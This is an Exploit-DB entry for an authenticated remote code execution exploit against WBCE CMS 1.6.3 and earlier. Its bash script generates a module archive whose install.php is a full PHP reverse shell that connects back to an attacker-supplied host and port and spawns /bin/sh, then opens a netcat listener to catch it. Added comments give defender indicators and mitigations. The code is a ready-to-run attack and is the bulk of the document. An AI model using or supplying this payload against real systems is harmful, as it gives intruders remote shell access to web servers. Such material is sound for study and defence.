WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

EDB-ID:

52132

CVE:

N/A




Platform:

Multiple

Date:

2025-04-06


# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash

# Builds shellModule.zip, a WBCE module archive whose install.php is a reverse shell,
# then starts a netcat listener on <lport>

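# Argument check: exactly two positional arguments (<lhost> <lport>) are required.
# With any other count the script prints its description and usage, then exits 1
# before anything is written to disk.
if [[ $# -ne 2 ]]; then
	echo "[*] Description:"
	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
	echo "[*] It will create an infected module .zip file and start a netcat listener."
	echo "[*] Once the zip is created, you will have to login to the admin page"
	echo "[*] to upload and install the module, which will immediately run the shell"
	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
	echo "[!] Usage:"
	echo "[*] $0 <lhost> <lport>"
	exit 1
fi

# Dependency check. `command -v` is a shell builtin, so the test does not rely on
# an external `which` binary being present.
if ! command -v nc >/dev/null 2>&1; then
	echo "[!] Netcat is not installed."
	exit 1
fi

# NOTE(review): neither value is validated here; further down the script the shell
# expands both of them directly into the generated install.php source.
ip=$1
port=$2

# Start from a clean staging directory and remove any archive left by an earlier run.
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

# Quoted so "[*]" is printed literally instead of being parsed as a glob pattern
# (unquoted, it would expand to a file named "*" if one exists in the working directory).
echo "[*] Crafting Payload"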

# Writes shellModule/info.php, the module manifest. The heredoc delimiter is
# unquoted, so every "$" that must reach the PHP file literally is
# backslash-escaped; nothing in this manifest is taken from the script arguments.
#
# Defender note: the manifest carries fixed, recognisable values (module
# directory 'modshell', module name 'Reverse Shell', version '1.3.3.7', author
# 'Swammers8'). They are useful when auditing a module list for this exact
# sample, but they are plain strings that anyone reusing the script can change.
cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category        modules
 * @package         Reverse Shell
 * @author          Swammers8
 * @link                        https://swammers8.github.io/
 * @license         http://www.gnu.org/licenses/gpl.html
 * @platform        example.com
 * @requirements    PHP 5.6 and higher
 * @version         1.3.3.7
 * @lastmodified    May 22 2025
 *
 *
 */

\$module_directory               = 'modshell';
\$module_name                    = 'Reverse Shell';
\$module_function                = 'page';
\$module_version                 = '1.3.3.7';
\$module_platform                = '2.10.x';

\$module_author                  = 'Swammers8';
\$module_license                 = 'GNU General Public License';
\$module_description     = 'This module is a backdoor';

?>
EOF

# Writes shellModule/install.php. According to the usage text printed by this
# script, WBCE runs the module's install step as soon as an administrator
# uploads and installs the archive, so PHP placed in this file is executed by
# the CMS (presumably under the web server / PHP account -- not shown here).
#
# The body is the pentestmonkey php-reverse-shell referenced in the usage text.
# The heredoc delimiter is unquoted: the shell expands $ip and $port into the
# file, while every other "$" is backslash-escaped and reaches PHP literally.
# NOTE(review): $ip and $port are inserted without validation or escaping.
#
# What the generated file does when it runs: forks and calls posix_setsid() if
# pcntl_fork exists, chdir("/"), umask(0), opens a TCP connection to $ip:$port
# with fsockopen(), starts 'uname -a; w; id; /bin/sh -i' through proc_open(),
# and relays data between the socket and the process pipes until the socket or
# the process's stdout reaches EOF.
#
# Defender notes: the observable signs are a PHP / web-server process spawning
# /bin/sh and holding an outbound TCP connection, together with a newly
# installed module. Restricting who may install modules, filtering outbound
# connections from the web host, and listing proc_open / fsockopen in php.ini
# disable_functions would each interfere with this payload as written; none of
# them changes the fact that the module installer executes uploaded PHP.
#
# NOTE(review): printit() has no "global $daemon" declaration, so inside the
# function $daemon is an undefined local and the message is always printed.
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip';  // CHANGE THIS
\$port = $port;       // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
	\$pid = pcntl_fork();
	if (\$pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if (\$pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	\$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);


\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
	printit("\$errstr (\$errno)");
	exit(1);
}

\$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
	if (feof(\$sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof(\$pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

	if (in_array(\$sock, \$read_a)) {
		if (\$debug) printit("SOCK READ");
		\$input = fread(\$sock, \$chunk_size);
		if (\$debug) printit("SOCK: \$input");
		fwrite(\$pipes[0], \$input);
	}

	if (in_array(\$pipes[1], \$read_a)) {
		if (\$debug) printit("STDOUT READ");
		\$input = fread(\$pipes[1], \$chunk_size);
		if (\$debug) printit("STDOUT: \$input");
		fwrite(\$sock, \$input);
	}

	if (in_array(\$pipes[2], \$read_a)) {
		if (\$debug) printit("STDERR READ");
		\$input = fread(\$pipes[2], \$chunk_size);
		if (\$debug) printit("STDERR: \$input");
		fwrite(\$sock, \$input);
	}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
	if (!\$daemon) {
		print "\$string\n";
	}
}

?> 
EOF

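# Package the staging directory and delete it, leaving only shellModule.zip.
# Status messages are quoted so "[*]" is printed literally rather than being
# parsed as a glob pattern.
echo "[*] Zipping to shellModule.zip"
zip -r shellModule.zip shellModule
rm -rf shellModule
echo "[*] Please login to the WBCE admin panel to upload and install the module"
echo "[*] Starting listener"

# Blocks here until the listener exits. "$port" is quoted so the argument is
# passed to nc as a single word, without word splitting or globbing.
nc -lvnp "$port"

echo
echo
echo "[*] Done!"
# The only cleanup the script asks for is uninstalling the module by hand.
# NOTE(review): whether uninstalling removes every file the module placed on the
# server is not shown here -- confirm on the target after a test.
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"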